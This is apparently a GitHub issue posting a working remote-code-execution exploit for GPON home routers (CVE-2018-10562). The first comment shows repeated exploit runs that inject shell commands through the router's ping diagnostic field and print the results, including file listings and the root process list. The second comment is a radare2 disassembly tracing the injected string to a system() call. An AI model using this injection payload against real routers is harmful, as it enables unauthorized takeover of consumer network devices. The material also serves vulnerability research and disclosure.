[Exploit] CVE-2018-10562 GPON Home Routers RCE
nixawk opened this issue · 1 comments
nixawk commented
$ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ls /"
INFO:__main__:sending payload: 127.0.0.1;`echo BGgw;ls /;echo BGgw`;
diag_result = "ping -c 4 -s 64 127.0.0.1;BGgw
bin
boot
bootimg
dev
etc
home
include
initrd
lib
linuxrc
man
mnt
opt
proc
root
sbin
sys
tmp
uImage
usr
var
web
BGgw;
$ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ls /bin/"
INFO:__main__:sending payload: 127.0.0.1;`echo BMXr;ls /bin/;echo BMXr`;
diag_result = "ping -c 4 -s 64 127.0.0.1;BMXr
Console
EthMgr
GponCLI
GponSLID
LogMgr
MecMgr
MiscMgr
NetMgr
PonMgr
Ssp
TimerMgr
VmrMgr
WebMgr
ash
brctl
busybox
cat
catv
chgrp
chmod
chown
conntrack
cp
date
dd
df
dmesg
dnsmasq
dropbear
dsp
echo
egrep
false
fgrep
grep
gunzip
gzip
hostname
ip
ipaddr
iplink
iproute
iprule
iptables
iptables-restore
iptables-save
iptables-xml
iptunnel
kill
ln
ls
lsof
lspci
mReport
mkdir
mknod
mktemp
mount
mountpoint
mv
netstat
nice
ntpclient
pidof
ping
printenv
ps
pure-ftpd
pwd
rm
rmdir
sed
sh
sleep
stat
stty
sync
tar
tc
telnetd
touch
tr069Mgr
true
ttcp
umount
uname
usleep
vi
zcat
BMXr;
";
$ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ls /sbin/"
INFO:__main__:sending payload: 127.0.0.1;`echo rXVS;ls /sbin/;echo rXVS`;
diag_result = "ping -c 4 -s 64 127.0.0.1;rXVS
arp
ath_wifi.sh
ath_wifi_aquila.sh
ez-ipupdate
fget
format
gdbnfs
halt
hostapd
ifconfig
ifrename
init
insmod
iwconfig
iwevent
iwgetid
iwlist
iwpriv
iwspy
logread
lsmod
memshow
modprobe
nbtscan
nfsstart
ntfs-3g
poweroff
pppd
pppoe
pppoe-config
pppoe-connect
pppoe-stop
reboot
repeater_pass_configuration
rg_setup.sh
rmmod
route
scsi_id
setup.sh
sysctl
syslogd
udev
udev_volume_id
udevd
udevsend
udevstart
udhcpc
upnpd
vconfig
wifi_cb
wifi_test
wlanconfig
wpatalk
rXVS;
$ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ps"
INFO:__main__:sending payload: 127.0.0.1;`echo TFGQ;ps;echo TFGQ`;
diag_result = "ping -c 4 -s 64 127.0.0.1;TFGQ
PID Uid VSZ Stat Command
1 root 1136 S init
2 root SWN [ksoftirqd/0]
3 root SW< [events/0]
4 root SW< [khelper]
5 root SW< [kthread]
20 root SW< [kblockd/0]
23 root SW< [khubd]
40 root SW [pdflush]
41 root SW [pdflush]
42 root SW< [kswapd0]
43 root SW< [aio/0]
79 root SW [mtdblockd]
183 root SWN [jffs2_gcd_mtd1]
187 root 1132 S syslogd
193 root 724 S < udevd
407 root SW< [voshwtimer/0]
470 root 2116 S /bin/GponCLI
473 root 1808 S /bin/telnetd
476 root 1288 S /bin/dropbear
477 root 2116 S /bin/GponCLI --script
478 root 2116 S /bin/GponCLI --hook
479 root 1832 S Ssp
480 root 1832 S Ssp
481 root 1832 S < Ssp
482 root 1856 S < /bin/TimerMgr -p 10 -s 0
483 root 1856 S < /bin/TimerMgr -p 10 -s 0
484 root 1856 S < /bin/TimerMgr -p 10 -s 0
485 root 2836 S /bin/LogMgr -p 20 -s 0
486 root 2300 S /bin/MiscMgr -p 20 -s 0
496 root 3624 S /bin/PonMgr -p 20 -s 0
497 root 2308 S /bin/NetMgr -p 20 -s 0
550 root 3604 S < /bin/VmrMgr -p 10 -s 0
551 root 3604 S < /bin/VmrMgr -p 10 -s 0
552 root 3604 S < /bin/VmrMgr -p 10 -s 0
553 root 3968 S /bin/EthMgr -p 20 -s 0
554 root 6360 S /bin/tr069Mgr -p 20 -s 0
573 root 6360 S /bin/tr069Mgr -p 20 -s 0
574 root 6360 S < /bin/tr069Mgr -p 20 -s 0
575 root 6360 S < /bin/tr069Mgr -p 20 -s 0
576 root 6360 S < /bin/tr069Mgr -p 20 -s 0
577 root 2332 S /bin/WebMgr -p 20 -s 0
580 root 6336 S /bin/MecMgr -p 20 -s 0
607 root 3624 D /bin/PonMgr -p 20 -s 0
608 root 3624 S /bin/PonMgr -p 20 -s 0
609 root 3624 D < /bin/PonMgr -p 20 -s 0
684 root 2308 S /bin/NetMgr -p 20 -s 0
685 root 2308 S /bin/NetMgr -p 20 -s 0
692 root 3604 S < /bin/VmrMgr -p 10 -s 0
695 root SW< [voip isr/0]
698 root 3604 S < /bin/VmrMgr -p 10 -s 0
701 root SW< [TAPIevents/0]
709 root SW [TAPIdxt_int]
711 root 3604 S < /bin/VmrMgr -p 10 -s 0
720 root 6336 S /bin/MecMgr -p 20 -s 0
722 root SW< [brdg_wkq/0]
996 root 1140 S /bin/sh /sbin/pppoe-connect 0
1005 root 1412 S /sbin/pppd pty /sbin/pppoe -p /var/run/pppoe0.pid.ppp
1006 root 1132 S sh -c /sbin/pppoe -p /var/run/pppoe0.pid.pppoe -I wan
1007 nobody 600 S /sbin/pppoe -p /var/run/pppoe0.pid.pppoe -I wan0 -T 8
1032 nobody 812 S dnsmasq -6 /bin/mReport -C /tmp/dnsmasq.cfg -K
1033 root 800 S dnsmasq -6 /bin/mReport -C /tmp/dnsmasq.cfg -K
1216 root 1320 S upnpd ppp0 br0
1217 root 1320 S upnpd ppp0 br0
1218 root 1320 S upnpd ppp0 br0
1220 root 1320 S upnpd ppp0 br0
1221 root 1320 S upnpd ppp0 br0
1222 root 1320 S upnpd ppp0 br0
1224 root 1320 S upnpd ppp0 br0
1226 root 1320 S upnpd ppp0 br0
1228 root 1320 S upnpd ppp0 br0
1229 root 1320 S upnpd ppp0 br0
1315 root 1240 S hostapd -B /tmp/hostapd.conf
6834 root 2332 S /bin/WebMgr -p 20 -s 0
8360 root 2332 S /bin/WebMgr -p 20 -s 0
8363 root 1132 S sh -c echo "ping -c 4 -s 64 127.0.0.1;`echo TFGQ;ps;e
8364 root 1132 S sh -c echo "ping -c 4 -s 64 127.0.0.1;`echo TFGQ;ps;e
8365 root 1136 R ps
TFGQ;
";
$ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ls /web/"
INFO:__main__:sending payload: 127.0.0.1;`echo Rbfg;ls /web/;echo Rbfg`;
diag_result = "ping -c 4 -s 64 127.0.0.1;Rbfg
html
Rbfg;
";
$ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ls /web/html/"
INFO:__main__:sending payload: 127.0.0.1;`echo dZad;ls /web/html/;echo dZad`;
diag_result = "ping -c 4 -s 64 127.0.0.1;dZad
backup.html
ddns.html
devinfo.html
diag.html
dmz_alg.html
dns_host.html
download
error.html
firewall.html
images
index.html
init.html
ip_filter.html
lan.html
landev.html
language.html
laninfo.html
log.html
login.html
login_spa.html
logo.html
logout.html
mac_filter.html
menu.html
nat.html
nat_portforwarding.html
ntp.html
password.html
poninfo.html
reboot.html
rebooting.html
route.html
script
slid.html
style
tab.html
template
tr069.html
upgrade.html
upnp.html
usb.html
wan.html
waninfo.html
wifi.html
dZad;
";
nixawk commented
root@labs:~/CVE-2018-10562# radare2 WebMgr
[0x000098e8]> i;il;
blksz 0x0
block 0x100
fd 5
file WebMgr
format elf
iorw true
mode rw-
size 0x708
humansz 1.8K
type EXEC (Executable file)
arch arm
binsz 132806
bintype elf
bits 32
canary false
class ELF32
crypto false
endian little
havecode true
intrp /lib/ld-uClibc.so.0
lang c
linenum false
lsyms false
machine ARM
maxopsz 4
minopsz 4
nx false
os linux
pcalign 4
pic false
relocs false
relro no
rpath NONE
static false
stripped true
subsys linux
va true
[Linked libraries]
libvos.so
libmib.so
libpthread.so.0
libm.so.0
libWebs.so
libc.so.0
6 libraries
[0x00009870]> aaa
[x] Analyze all flags starting with sym. and entry0 (aa)
[ ]
[Value from 0x00008000 to 0x000279b4
aav: 0x00008000-0x000279b4 in 0x8000-0x279b4
aav: 0x00008000-0x000279b4 in 0x28000-0x289f8
Value from 0x00028000 to 0x000289f8
aav: 0x00028000-0x000289f8 in 0x8000-0x279b4
aav: 0x00028000-0x000289f8 in 0x28000-0x289f8
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Use -AA or aaaa to perform additional experimental analysis.
[x] Constructing a function name for fcn.* and sym.func.* functions (aan)
[0x00009870]> afl
0x000093f0 1 16 sym._init
0x00009414 1 12 sym.imp.websSetDefaultDir
0x00009420 1 12 sym.imp.websWrite
0x0000942c 1 12 sym.imp.websSSLClose
0x00009438 1 12 sym.imp.inet_aton
0x00009444 1 12 sym.imp.fwrite
0x00009450 1 12 sym.imp.system
0x0000945c 1 12 sym.imp.usleep
0x00009468 1 12 sym.imp.VOS_SendMsg
0x00009474 1 12 sym.imp.memcpy
0x00009480 1 12 sym.imp.webs_get_uptime
0x0000948c 1 12 sym.imp.net_check_ipv6_prefix
0x00009498 1 12 sym.imp.websAspDefine
0x000094a4 1 12 sym.imp.getsockname
0x000094b0 1 12 sym.imp.strcat
0x000094bc 1 12 sym.imp.VOS_Hex2Binary
0x000094c8 1 12 sym.imp.getcwd
0x000094d4 1 12 sym.imp.getnameinfo
0x000094e0 1 12 sym.imp.strcasecmp
0x000094ec 1 12 sym.imp.strrchr
0x000094f8 1 12 sym.imp.websHeader
0x00009504 1 12 sym.imp.strncmp
0x00009510 1 12 sym.imp.ascToUni
0x0000951c 1 12 sym.imp.__uClibc_main
0x00009528 1 12 sym.imp.inet_pton
0x00009534 1 12 sym.imp.websRedirect
0x00009540 1 12 sym.imp.VOS_Host2Str
0x0000954c 1 12 sym.imp.strlen
0x00009558 1 12 sym.imp.websRedirectFirstHttp
0x00009564 1 12 sym.imp.LOG_Open
0x00009570 1 12 sym.imp.VOS_SendSyncMsg
0x0000957c 1 12 sym.imp.VOS_ExecStr
0x00009588 1 12 sym.imp.websFormHandler
0x00009594 1 12 sym.imp.websSSLOpen
0x000095a0 1 12 sym.imp.VOS_StopTimer
0x000095ac 1 12 sym.imp.bopen
0x000095b8 1 12 sym.imp.websGetDefaultDir
0x000095c4 1 12 sym.imp.fclose
0x000095d0 1 12 sym.imp.fread
0x000095dc 1 12 sym.imp.VOS_AppStart
0x000095e8 1 12 sym.imp.fopen
0x000095f4 1 12 sym.imp.VOS_Str2Host
0x00009600 1 12 sym.imp.websFormDefine
0x0000960c 1 12 sym.imp.getpeername
0x00009618 1 12 sym.imp.VOS_CfgParamGetByName
0x00009624 1 12 sym.imp.websDefaultHandler
0x00009630 1 12 sym.imp.websUrlHandlerDefine
0x0000963c 1 12 sym.imp.VOS_NewIpv6GetHostByName
0x00009648 1 12 sym.imp.VOS_E8C_Log
0x00009654 1 12 sym.imp.VOS_NewGetHostByName
0x00009660 1 12 sym.imp.VOS_SpawnTask
0x0000966c 1 12 sym.imp.websFooter
0x00009678 1 12 sym.imp.socketSelect
0x00009684 1 12 sym.imp.tempnam
0x00009690 1 12 sym.imp.fgets
0x0000969c 1 12 sym.imp.socketPtr
0x000096a8 1 12 sym.imp.strncpy
0x000096b4 1 12 sym.imp.websOpenServer
0x000096c0 1 12 sym.imp.socketReady
0x000096cc 1 12 sym.imp.websSetHost
0x000096d8 1 12 sym.imp.fputs
0x000096e4 1 12 sym.imp.websGetVar
0x000096f0 1 12 sym.imp.unlink
0x000096fc 1 12 sym.imp.memset
0x00009708 1 12 sym.imp.VOS_Base64Decode
0x00009714 1 12 sym.imp.inet_ntoa
0x00009720 1 12 sym.imp.emfSchedProcess
0x0000972c 1 12 sym.imp.VOS_Ntohl
0x00009738 1 12 sym.imp.VOS_ResponseSyncMsg
0x00009744 1 12 sym.imp.inet_addr
0x00009750 1 12 sym.imp.abort
0x0000975c 1 12 sym.imp.memcmp
0x00009768 1 12 sym.imp.sprintf
0x00009774 1 12 sym.imp.LOG_Print
0x00009780 1 12 sym.imp.websSetIpaddr
0x0000978c 1 12 sym.imp.bstrdup
0x00009798 1 12 sym.imp.__aeabi_idivmod
0x000097a4 1 12 sym.imp.VOS_Binary2Hex
0x000097b0 1 12 sym.imp.VOS_StartTimer
0x000097bc 1 12 sym.imp.VOS_RegLoopHandler
0x000097c8 1 12 sym.imp.strstr
0x000097d4 1 12 sym.imp.strcmp
0x000097e0 1 12 sym.imp.socketProcess
0x000097ec 1 12 sym.imp.VOS_AppInit
0x000097f8 1 12 sym.imp.socketOpen
0x00009804 1 12 sym.imp.websDone
0x00009810 1 12 sym.imp.free
0x0000981c 1 12 sym.imp.atoi
0x00009828 1 12 sym.imp.strchr
0x00009834 1 12 sym.imp.puts
0x00009840 1 12 sym.imp.signal
0x0000984c 1 12 sym.imp.inet_ntop
0x00009858 1 12 sym.imp.VOS_CheckFileImgCRC
0x00009864 1 12 sym.imp.strcpy
0x00009870 1 44 entry0
0x000098e8 1 24 entry2.fini
0x00009904 4 48 entry1.init
0x00009958 1 16 sym.defaultErrorHandler
0x00009968 1 16 sym.defaultTraceHandler
0x000099c8 1 52 main
0x00009a0c 3 104 sub.LOG_Print_a0c
0x00009a88 4 120 sub.LOG_Print_a88
0x00009b14 1 156 sub.memset_b14
0x00009bc8 4 188 sym.IsLanIpaddr
0x00009c98 1 220 sub.websWrite_c98
0x00009db0 1 40 fcn.00009db0
0x00009ef8 7 548 sub.bopen_ef8
0x0000a224 9 132 sub.socketPtr_224
0x0000a2a8 51 1024 sym.webLoginCheck
0x0000a778 14 356 sub.socketPtr_778
0x0000a8ec 14 500 sym.websDoRedirectFirstHttp
0x0000ad7c 12 184 sub.__aeabi_idivmod_d7c
0x0000ae34 1 272 -> 300 sub.websAspDefine_e34
0x0000af8c 7 148 sub.fopen_f8c
0x0000b478 6 156 sub.websGetDefaultDir_478
0x0000b6ec 1 220 sub.websWrite_6ec
0x0000b804 6 168 sub.webs_get_uptime_804
0x0000b8c0 5 148 sub.memset_8c0
0x0000ba38 1 40 sub.websAspDefine_a38
0x0000bafc 1 60 sub.websAspDefine_afc
0x0000c0c0 1 60 sub.websAspDefine_c0
0x0000c7d8 1 60 sub.websAspDefine_7d8
0x0000c97c 7 508 sub.memset_97c
0x0000ccbc 1 72 sub.websAspDefine_cbc
0x0000d190 1 60 sub.websAspDefine_190
0x0000d1e0 1 60 sub.websAspDefine_1e0
0x0000d230 1 60 sub.websAspDefine_230
0x0000d280 1 60 sub.websAspDefine_280
0x0000dcfc 10 268 sub.memset_cfc
0x0000dfe8 23 900 sub.memset_fe8
0x0000e4e4 10 388 sub.memset_4e4
0x0000e82c 1 40 sub.websAspDefine_82c
0x0000e864 35 1364 sub.memset_864
0x0000f5ec 1 120 sub.websAspDefine_5ec
0x00011620 1 64 sub.websAspDefine_620
0x00011f20 1 72 sub.websAspDefine_f20
0x00012cc0 1 88 sub.websAspDefine_cc0
0x00014aec 1 120 sub.websAspDefine_aec
0x0001601c 1 64 sub.websAspDefine_1c
0x000165a8 1 52 sub.websAspDefine_5a8
0x00017d0c 1 40 sub.websAspDefine_d0c
0x00018120 1 52 sub.websAspDefine_120
0x00018a78 1 60 sub.websAspDefine_a78
0x00018ca4 1 60 sub.websAspDefine_ca4
0x00019098 1 60 sub.websAspDefine_98
0x0001963c 1 60 sub.websAspDefine_63c
0x00019a00 1 72 sub.websAspDefine_a00
0x0001a340 1 60 sub.websAspDefine_340
0x0001ad88 1 28 fcn.0001ad88
0x0001af90 1 100 sub.websAspDefine_f90
0x0001c304 1 132 sub.websAspDefine_304
0x0001d778 1 40 sub.websAspDefine_778
0x0001da40 1 40 sub.websAspDefine_a40
0x0001ddf4 1 60 sub.websAspDefine_df4
0x0001e230 1 60 sub.websAspDefine_230
0x0001e48c 1 88 sub.websFormDefine_48c
0x0001ee88 1 40 sub.websAspDefine_e88
0x0001eec0 3 124 sub.VOS_SendSyncMsg_ec0
0x0001f0e0 1 60 sub.websAspDefine_e0
0x0001f8a0 1 28 loc.0001f8a0
0x0001fa98 1 40 sub.websAspDefine_a98
0x0001fef4 1 16 sym._fini
[0x00009870]> / ping
Searching 4 bytes in [0x8000-0x279b4]
hits: 14
Searching 4 bytes in [0x28000-0x289f8]
hits: 0
0x00024407 hit0_0 .ailPortmapping rules max.ADD.
0x00024482 hit0_1 .No portmapping rule.DEL_po.
0x000246e0 hit0_2 .wan_list[%d].mapping_list_count = %d.
0x00024708 hit0_3 .wan_list[%d].mapping_list = new Arra.
0x00024738 hit0_4 .wan_list[%d].mapping_list[%d]='%s';.
0x0002526e hit0_5 .fail snooping_enable="%d";.
0x000252ac hit0_6 .igmpsnoopingenableproxyena.
0x00025f58 hit0_7 .diagshowpingtracert255.
0x000260d7 hit0_8 .secho "ping6 -I %s -c 4 %s.
0x000260f8 hit0_9 .%s" >> %sping6 -I %s -c 4 %s .
0x00026121 hit0_10 . 2>&1echo "No ping test." > %s.
0x000261ff hit0_11 . %secho "ping -c 4 %s" >> %s.
0x00026218 hit0_12 . %s" >> %sping -c 4 %s -I %s 1.
0x0002628f hit0_13 . 2>&1echo "ping/traceroute fini.
[0x00009870]> pd @ 0x000261ff
;-- hit0_11:
0x000261ff 70 unaligned
0x00026200 696e6720 rsbhs r6, r7, sb, ror 28
0x00026204 2d632034 strtlo r6, [r0], -0x32d
,=< 0x00026208 2025730a beq 0x1cef690
| 0x0002620c 22203e3e invalid
| 0x00026210 20257300 rsbseq r2, r3, r0, lsr 10
| 0x00026214 00000000 andeq r0, r0, r0
| ;-- str.ping__c_4__s__I__s_1___s_2__1:
| ;-- hit0_12:
| ; UNKNOWN XREF from 0x0001aafc (aav.0x0001a684 + 1144)
| 0x00026218 .string "ping -c 4 %s -I %s 1>>%s 2>&1" ; len=30
| 0x00026236 0000 unaligned
| 0x00026237 00 unaligned
| ;-- str.echo____traceroute__n__I__s________s:
| ; UNKNOWN XREF from 0x0001ab00 (aav.0x0001a684 + 1148)
| 0x00026238 .string "echo \"\ntraceroute -n -I %s\n\" >> %s" ; len=35
| 0x0002625b 00 unaligned
| 0x0002625c 00000000 andeq r0, r0, r0
| ;-- str.traceroute__n__I__s__s__s_1___s_2__1:
| ; UNKNOWN XREF from 0x0001ab04 (aav.0x0001a684 + 1152)
| 0x00026260 .string "traceroute -n -I %s -s %s 1>>%s 2>&1" ; len=37
| 0x00026285 000000 unaligned
| 0x00026286 0000 unaligned
| 0x00026287 00 unaligned
| ;-- str.echo__ping_traceroute_finished.________s:
| ; UNKNOWN XREF from 0x0001ab0c (aav.0x0001a684 + 1160)
| 0x00026288 .string "\necho \"ping/traceroute finished.\n\" >> %s" ; len=41
| ;-- hit0_13:
| 0x0002628f 70 unaligned
| 0x00026290 696e672f svchs 0x676e69
| 0x00026294 74726163 invalid
| 0x00026298 65726f75 strbvc r7, [0x0002603b]!
| 0x0002629c 74652066 qsub16vs r6, r0, r4
| 0x000262a0 696e6973 invalid
| 0x000262a4 6865642e invalid
| 0x000262a8 0a22203e invalid
| 0x000262ac 3e202573 invalid
| 0x000262b0 00000000 andeq r0, r0, r0
| 0x000262b4 00000000 andeq r0, r0, r0
| ;-- str.diag_state_____d:
| ; UNKNOWN XREF from 0x0001ad5c (aav.0x0001ab10 + 588)
| 0x000262b8 .string "diag_state = %d;\n" ; len=19
| 0x000262cb 00 unaligned
| 0x000262cc 00000000 andeq r0, r0, r0
| ;-- str.diag_result:
| ; UNKNOWN XREF from 0x0001ad7c (aav.0x0001ab10 + 620)
| 0x000262d0 .string "diag_result = \"" ; len=16
| ;-- str.Tr069Info_GetConfig:
| ; UNKNOWN XREF from 0x0001ada4 (fcn.0001ad88 + 28)
| 0x000262e0 .string "Tr069Info_GetConfig" ; len=20
| 0x000262f4 00000000 andeq r0, r0, r0
| ;-- str.home_rongweilun_svn_gemocean_release_SWOntR4152B018_160621_0100277_src_app_web_src_web_tr069info.c:
| ; UNKNOWN XREF from 0x0001aea8 (sub.VOS_SendSyncMsg_dac + 252)
| ; UNKNOWN XREF from 0x0001af8c (aav.0x0001aeac + 224)
| 0x000262f8 .string "/home/rongweilun/svn/gemocean/release/SWOntR4152B018_160621_0100277/src/app/web/src/web_tr069info.c" ; len=100
| 0x0002635c 00000000 andeq r0, r0, r0
| ;-- str.Tr069WanConnect__d_____d:
| ; UNKNOWN XREF from 0x0001af78 (aav.0x0001aeac + 204)
| 0x00026360 .string "Tr069WanConnect[%d] = %d; \n" ; len=28
| 0x0002637c 00000000 andeq r0, r0, r0
| ;-- str.web_get_cfg_send_syc_message_fail:
| ; UNKNOWN XREF from 0x0001af88 (aav.0x0001aeac + 220)
| 0x00026380 .string "web get cfg send syc message fail" ; len=34
| 0x000263a2 0000 unaligned
| 0x000263a3 00 unaligned
| 0x000263a4 00000000 andeq r0, r0, r0
| ;-- str.Device_GetConfig:
| ; UNKNOWN XREF from 0x0001aff8 (sub.websAspDefine_f90 + 104)
| 0x000263a8 .string "Device_GetConfig" ; len=17
| 0x000263b9 000000 unaligned
| 0x000263ba 0000 unaligned
| 0x000263bb 00 unaligned
| 0x000263bc 00000000 andeq r0, r0, r0
| ;-- str.device_Form:
| ; UNKNOWN XREF from 0x0001b000 (sub.websAspDefine_f90 + 112)
| 0x000263c0 .string "device_Form" ; len=12
| 0x000263cc 00000000 andeq r0, r0, r0
| ;-- str.usb_restore_Form:
| ; UNKNOWN XREF from 0x0001b008 (sub.websAspDefine_f90 + 120)
| 0x000263d0 .string "usb_restore_Form" ; len=17
| 0x000263e1 000000 unaligned
| 0x000263e2 0000 unaligned
| 0x000263e3 00 unaligned
| 0x000263e4 00000000 andeq r0, r0, r0
| ;-- str.init_XForm:
| ; UNKNOWN XREF from 0x0001b010 (sub.websAspDefine_f90 + 128)
| 0x000263e8 .string "init_XForm" ; len=11
| 0x000263f3 00 unaligned
| 0x000263f4 00000000 andeq r0, r0, r0
| ;-- str.reboot_XForm:
| ; UNKNOWN XREF from 0x0001b018 (sub.websAspDefine_f90 + 136)
| 0x000263f8 .string "reboot_XForm" ; len=13
| 0x00026405 000000 unaligned
| 0x00026406 0000 unaligned
| 0x00026407 00 unaligned
| ;-- str.backup_XForm:
| ; UNKNOWN XREF from 0x0001b020 (sub.websAspDefine_f90 + 144)
| 0x00026408 .string "backup_XForm" ; len=13
| 0x00026415 000000 unaligned
[0x00009870]> pd @ 0x0001aafc
; DATA XREF from 0x0001a9c0 (aav.0x0001a684 + 828)
0x0001aafc .dword 0x00026218 ; str.ping__c_4__s__I__s_1___s_2__1 ; hit0_12
; DATA XREF from 0x0001aa18 (aav.0x0001a684 + 916)
0x0001ab00 .dword 0x00026238 ; str.echo____traceroute__n__I__s________s
; DATA XREF from 0x0001aa3c (aav.0x0001a684 + 952)
0x0001ab04 .dword 0x00026260 ; str.traceroute__n__I__s__s__s_1___s_2__1
; DATA XREF from 0x0001aa60 (aav.0x0001a684 + 988)
0x0001ab08 .dword 0x00026198 ; str.echo__No_traceroute_test.__________s
; DATA XREF from 0x0001aa74 (aav.0x0001a684 + 1008)
0x0001ab0c .dword 0x00026288 ; str.echo__ping_traceroute_finished.________s
;-- aav.0x0001ab10:
; UNKNOWN XREF from 0x0001a380 (sub.websAspDefine_340 + 64)
0x0001ab10 0dc0a0e1 mov ip, sp
0x0001ab14 f0df2de9 push {r4, r5, r6, r7, r8, sb, sl, fp, ip, lr, pc}
0x0001ab18 04b04ce2 sub fp, ip, 4
0x0001ab1c 34429fe5 ldr r4, aav.0x00028670 ; [0x1ad58:4]=0x28670 aav.0x00028670
0x0001ab20 01da4de2 sub sp, sp, 0x1000
0x0001ab24 825e4be2 sub r5, fp, 0x820
0x0001ab28 0cd04de2 sub sp, sp, 0xc
0x0001ab2c 0c5045e2 sub r5, r5, 0xc
0x0001ab30 0190a0e1 mov sb, r1
0x0001ab34 022ba0e3 mov r2, 0x800 ; 2048
0x0001ab38 0010a0e3 mov r1, 0
0x0001ab3c 0500a0e1 mov r0, r5
0x0001ab40 edbaffeb bl sym.imp.memset ; void *memset(void *s, int c, size_t n)
0x0001ab44 0900a0e1 mov r0, sb
0x0001ab48 0c129fe5 ldr r1, str.diag_state_____d ; [0x1ad5c:4]=0x262b8 str.diag_state_____d
0x0001ab4c 002094e5 ldr r2, [r4]
0x0001ab50 32baffeb bl sym.imp.websWrite
0x0001ab54 013a4be2 sub r3, fp, 0x1000
0x0001ab58 300003e5 str r0, [r3, -0x30]
0x0001ab5c 003094e5 ldr r3, [r4]
0x0001ab60 020053e3 cmp r3, 2 ; 2
,=< 0x0001ab64 1b00001a bne 0x1abd8
| 0x0001ab68 f0019fe5 ldr r0, str.tmp_.web_diag.txt ; [0x1ad60:4]=0x26020 str.tmp_.web_diag.txt
| 0x0001ab6c f0119fe5 ldr r1, aav.0x000255b0 ; [0x1ad64:4]=0x255b0 aav.0x000255b0
| 0x0001ab70 9cbaffeb bl sym.imp.fopen ; file*fopen(const char *filename,
| 0x0001ab74 004050e2 subs r4, r0, 0
,==< 0x0001ab78 0600000a beq 0x1ab98
|| 0x0001ab7c 0500a0e1 mov r0, r5
|| 0x0001ab80 e0119fe5 ldr r1, [0x0001ad68] ; [0x1ad68:4]=0x7ff
|| 0x0001ab84 0120a0e3 mov r2, 1 ; 1
|| 0x0001ab88 0430a0e1 mov r3, r4
|| 0x0001ab8c 8fbaffeb bl sym.imp.fread ; size_t fread(void *ptr, FILE *stream)
|| 0x0001ab90 0400a0e1 mov r0, r4
|| 0x0001ab94 8abaffeb bl sym.imp.fclose ; int fclose(FILE *stream)
|| ; JMP XREF from 0x0001ab78 (aav.0x0001ab10 + 104)
`--> 0x0001ab98 cc319fe5 ldr r3, aav.0x00028674 ; [0x1ad6c:4]=0x28674 aav.0x00028674
| 0x0001ab9c 0040a0e3 mov r4, 0
| 0x0001aba0 0410a0e1 mov r1, r4
| 0x0001aba4 004083e5 str r4, [r3]
| 0x0001aba8 4020a0e3 mov r2, 0x40 ; '@' ; 64
| 0x0001abac bc019fe5 ldr r0, aav.0x00028678 ; [0x1ad70:4]=0x28678 aav.0x00028678
| 0x0001abb0 d1baffeb bl sym.imp.memset ; void *memset(void *s, int c, size_t n)
| 0x0001abb4 0410a0e1 mov r1, r4
| 0x0001abb8 2020a0e3 mov r2, 0x20 ; 32
| 0x0001abbc b0019fe5 ldr r0, aav.0x000286f8 ; [0x1ad74:4]=0x286f8 aav.0x000286f8
| 0x0001abc0 cdbaffeb bl sym.imp.memset ; void *memset(void *s, int c, size_t n)
| 0x0001abc4 0410a0e1 mov r1, r4
| 0x0001abc8 1f2ea0e3 mov r2, 0x1f0 ; 496
| 0x0001abcc a4019fe5 ldr r0, aav.0x00028718 ; [0x1ad78:4]=0x28718 aav.0x00028718
| 0x0001abd0 c9baffeb bl sym.imp.memset ; void *memset(void *s, int c, size_t n)
,==< 0x0001abd4 0b0000ea b 0x1ac08
|| ; JMP XREF from 0x0001ab64 (aav.0x0001ab10 + 84)
|`-> 0x0001abd8 80019fe5 ldr r0, str.tmp_.web_diag.txt ; [0x1ad60:4]=0x26020 str.tmp_.web_diag.txt
| 0x0001abdc 80119fe5 ldr r1, aav.0x000255b0 ; [0x1ad64:4]=0x255b0 aav.0x000255b0
| 0x0001abe0 80baffeb bl sym.imp.fopen ; file*fopen(const char *filename,
| 0x0001abe4 004050e2 subs r4, r0, 0
|,=< 0x0001abe8 0600000a beq 0x1ac08
|| 0x0001abec 0500a0e1 mov r0, r5
|| 0x0001abf0 70119fe5 ldr r1, [0x0001ad68] ; [0x1ad68:4]=0x7ff
|| 0x0001abf4 0120a0e3 mov r2, 1 ; 1
|| 0x0001abf8 0430a0e1 mov r3, r4
[0x00009870]> pd @ 0x0001a9c0
0x0001a9c0 34119fe5 ldr r1, str.ping__c_4__s__I__s_1___s_2__1 ; [0x1aafc:4]=0x26218 hit0_12
0x0001a9c4 0030a0e1 mov r3, r0
0x0001a9c8 e8209fe5 ldr r2, aav.0x000286b8 ; [0x1aab8:4]=0x286b8 aav.0x000286b8
0x0001a9cc 0400a0e1 mov r0, r4
0x0001a9d0 00508de5 str r5, [sp]
0x0001a9d4 63bbffeb bl sym.imp.sprintf ; int sprintf(char *s,
,=< 0x0001a9d8 030000ea b 0x1a9ec
| ; JMP XREF from 0x0001a990 (aav.0x0001a684 + 780)
| 0x0001a9dc 0520a0e1 mov r2, r5
| 0x0001a9e0 0400a0e1 mov r0, r4
| 0x0001a9e4 f8109fe5 ldr r1, str.echo__No_ping_test._________s ; [0x1aae4:4]=0x26118 str.echo__No_ping_test._________s
| 0x0001a9e8 5ebbffeb bl sym.imp.sprintf ; int sprintf(char *s,
| ; JMP XREF from 0x0001a9d8 (aav.0x0001a684 + 852)
`-> 0x0001a9ec 0400a0e1 mov r0, r4
0x0001a9f0 96baffeb bl sym.imp.system ; int system(const char *string)
0x0001a9f4 d8009fe5 ldr r0, aav.0x000286f8 ; [0x1aad4:4]=0x286f8 aav.0x000286f8
0x0001a9f8 e8109fe5 ldr r1, str.tracert ; [0x1aae8:4]=0x25f60 str.tracert
0x0001a9fc 71bbffeb bl sym.imp.strstr ; char*strstr(char *s1, const char *s2)
0x0001aa00 000050e3 cmp r0, 0
0x0001aa04 664f4be2 sub r4, fp, 0x198
0x0001aa08 94509fe5 ldr r5, str.tmp_.web_diag.txt ; [0x1aaa4:4]=0x26020 str.tmp_.web_diag.txt
,=< 0x0001aa0c 1100000a beq 0x1aa58
| 0x0001aa10 9c209fe5 ldr r2, aav.0x00028678 ; [0x1aab4:4]=0x28678 aav.0x00028678
| 0x0001aa14 0530a0e1 mov r3, r5
| 0x0001aa18 e0109fe5 ldr r1, str.echo____traceroute__n__I__s________s ; [0x1ab00:4]=0x26238 str.echo____traceroute__n__I__s________s
